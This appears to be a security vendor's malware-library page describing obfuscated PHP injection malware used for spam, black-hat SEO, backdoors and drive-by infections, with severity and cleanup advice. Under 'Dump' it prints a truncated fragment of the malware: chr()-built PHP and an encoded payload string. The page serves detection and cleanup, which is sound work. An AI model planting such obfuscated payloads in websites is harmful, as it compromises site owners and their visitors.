PRICING SUPPORT LOGIN

Sophisticated malware which has been obfuscated by the join PHP function and attackers made seed. It creates and injects malicious functions based on set payload.
It can be used for mass SPAM, black SEO SPAM and pharma SPAM, as well as for more "harmful" code such as backdoors and website drive-by infections.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

.chr(41)."".chr(59)."";$Kyhbn3710 = $wnMGCO8907."'zV0LUxs5l/0r2arUTNhkZ7sldau7skwVkGBggzNAwNhTKcoPYoMf8GGMsb/Nf1+9ulvq027bQCaZTOK+klo6kq7uuXpYfl359Hl769PJ378P+1eD0bfJ+LLDOf396+bW3V1z9ub3y99f/fH73d3N3cWderyV/9zc3V+Nur+/+318f6cCb8ZCkE8iQAtjKd3fDeTH5UgETEYq6PLuqjm4mqtHEdpqqreUGLKLzmX7piPD2zeT0b34vL+7GoqPb4MbXa58RT419SsX8t/2zejh8k6mHk9aEtG734edQGUio52MDMaLOw1AYh802wkaUx1RVRGqsr603lEtIWJU+SpGJ1cZq0wvVesMmulrCXwVfKPh6xpfXqhSFUIBX+WtqyAfW7r5VKhVHV0Vk7H8GGYtvQC0Cm1fZghzaQxCq+YKa1bHby